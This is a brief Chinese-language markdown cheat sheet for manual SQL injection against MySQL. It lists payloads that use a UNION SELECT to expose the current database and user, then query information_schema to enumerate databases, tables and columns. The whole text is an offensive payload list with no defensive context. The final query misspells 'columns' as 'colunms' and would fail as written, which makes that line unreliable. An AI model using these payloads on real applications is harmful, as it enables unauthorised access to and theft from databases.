sql手工注入.md
sql手工注入
mysql
#当前数据库库名,用户名
union select database(), user()
#找所有数据库库名
select+schema_name+from+information_schema.schemata limit 1,1;
#找一个数据库库中有哪些表名
select table_name from information_schema.tables where table_schema = "库名";
#找一个表中有哪些列名:
select column_name from information_schema.colunms where table_name ="表名";